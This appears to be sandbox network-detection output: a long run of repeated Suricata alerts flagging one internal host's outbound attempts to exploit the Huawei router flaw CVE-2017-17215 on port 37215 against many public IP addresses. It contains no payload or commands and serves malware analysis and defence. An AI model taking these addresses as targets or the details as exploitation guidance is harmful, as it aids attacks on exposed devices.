      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58718 -> 41.189.6.49:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49196 -> 197.47.60.68:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58804 -> 157.118.125.243:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58198 -> 157.132.199.220:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34930 -> 133.227.109.38:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45454 -> 197.111.111.201:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53074 -> 197.139.7.61:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38040 -> 106.95.246.147:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40480 -> 157.134.179.219:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:55094 -> 164.198.74.35:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35246 -> 94.252.250.153:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58554 -> 197.248.130.164:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38480 -> 41.217.213.110:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34146 -> 173.40.40.177:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38232 -> 175.78.206.202:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49424 -> 211.101.167.39:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51062 -> 42.125.118.136:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49326 -> 197.157.210.207:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53590 -> 41.28.165.54:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:60302 -> 41.10.8.133:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52716 -> 197.1.126.71:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36540 -> 197.165.84.176:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42428 -> 157.159.187.200:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51116 -> 41.149.251.27:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59650 -> 157.201.253.144:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54496 -> 197.94.22.5:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54834 -> 197.198.227.69:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34336 -> 157.199.114.238:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:57612 -> 131.126.166.210:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38854 -> 203.134.152.27:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34758 -> 60.72.138.139:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51094 -> 157.143.12.42:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34426 -> 157.198.226.219:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37556 -> 197.224.91.112:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56768 -> 162.199.37.227:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43622 -> 41.148.172.75:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33402 -> 41.56.74.159:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53522 -> 41.105.184.97:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40356 -> 173.251.233.80:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37892 -> 41.145.5.206:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47838 -> 41.220.251.218:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42562 -> 157.91.212.4:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37648 -> 41.120.59.5:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59442 -> 202.58.238.201:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40600 -> 197.86.248.201:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40402 -> 155.75.111.182:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44756 -> 41.135.123.15:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54714 -> 157.190.56.15:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33564 -> 41.185.106.254:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47144 -> 197.105.185.233:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56868 -> 157.59.76.62:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46114 -> 41.97.138.119:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35310 -> 41.8.52.20:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42712 -> 197.101.3.82:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42876 -> 197.238.209.229:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59618 -> 52.152.250.38:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39972 -> 41.31.109.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38924 -> 197.3.217.89:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34172 -> 41.136.214.161:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33692 -> 41.238.107.26:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56534 -> 157.37.22.210:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58028 -> 197.61.142.226:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56268 -> 157.18.35.200:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44798 -> 41.158.143.210:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58946 -> 157.97.251.6:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52686 -> 157.179.242.22:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51754 -> 79.94.24.77:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53392 -> 157.50.105.247:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40274 -> 157.234.192.151:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:54358 -> 157.165.210.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58384 -> 157.204.167.127:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46918 -> 96.176.155.16:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46190 -> 41.34.240.143:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49450 -> 59.10.198.202:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43234 -> 197.237.242.229:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48418 -> 157.51.221.247:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43248 -> 157.58.248.223:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59522 -> 197.193.183.14:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46208 -> 157.18.73.55:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40108 -> 41.210.76.62:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35348 -> 41.38.53.198:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43244 -> 157.81.1.178:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45624 -> 41.97.209.80:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35960 -> 157.2.171.11:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56474 -> 197.111.141.68:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42010 -> 157.124.205.244:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48338 -> 157.26.94.142:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59630 -> 41.16.95.175:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:34672 -> 41.77.38.63:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37884 -> 157.249.209.50:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53040 -> 157.109.98.27:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59206 -> 197.228.22.117:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35838 -> 41.4.207.37:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41488 -> 157.101.42.11:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45126 -> 197.201.145.182:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36214 -> 157.9.204.120:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52512 -> 197.254.32.81:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:32770 -> 197.188.159.183:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49468 -> 89.28.214.73:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56430 -> 146.45.91.218:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46594 -> 58.122.193.180:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59694 -> 41.30.133.159:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40544 -> 41.155.21.138:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40732 -> 197.233.144.204:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47340 -> 103.85.252.42:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40228 -> 157.21.110.172:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47674 -> 41.113.57.82:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48516 -> 197.132.73.36:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53612 -> 157.1.41.12:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39112 -> 197.239.101.230:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51294 -> 41.131.167.239:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38358 -> 197.169.59.3:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47902 -> 48.104.208.230:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40234 -> 41.67.128.34:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42736 -> 197.200.97.110:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36536 -> 157.121.43.163:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47564 -> 109.198.32.157:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:33734 -> 41.205.128.24:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49664 -> 41.130.123.34:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:53144 -> 157.118.43.30:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:59734 -> 157.89.130.18:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56924 -> 157.167.148.181:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46856 -> 157.114.71.51:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:37040 -> 157.97.61.30:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:45666 -> 197.172.120.135:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49500 -> 197.240.124.23:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48184 -> 157.211.159.122:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47368 -> 197.200.115.126:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43688 -> 41.10.236.135:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:50780 -> 197.230.99.175:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47214 -> 41.210.243.61:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:44074 -> 134.2.240.117:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:35048 -> 197.198.98.180:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:48738 -> 41.100.146.172:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47206 -> 197.200.235.233:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52814 -> 197.150.252.146:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56768 -> 197.217.245.202:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:47056 -> 41.133.167.210:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42890 -> 82.210.224.47:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39582 -> 157.249.11.31:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:42240 -> 157.71.70.93:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41278 -> 37.10.152.172:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:49140 -> 74.184.57.182:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:56470 -> 197.173.151.237:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:40528 -> 197.165.141.134:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:39338 -> 41.144.159.181:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:36824 -> 157.108.238.46:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:51034 -> 157.119.37.204:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:41712 -> 157.212.68.15:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:52890 -> 194.49.134.41:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:46748 -> 197.35.174.101:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:43398 -> 157.199.87.197:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:58728 -> 197.74.147.22:37215
      Source: Network trafficSuricata IDS: 2835222 - Severity 1 - ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) : 192.168.2.23:38730 -> 157.223.123.104:37215
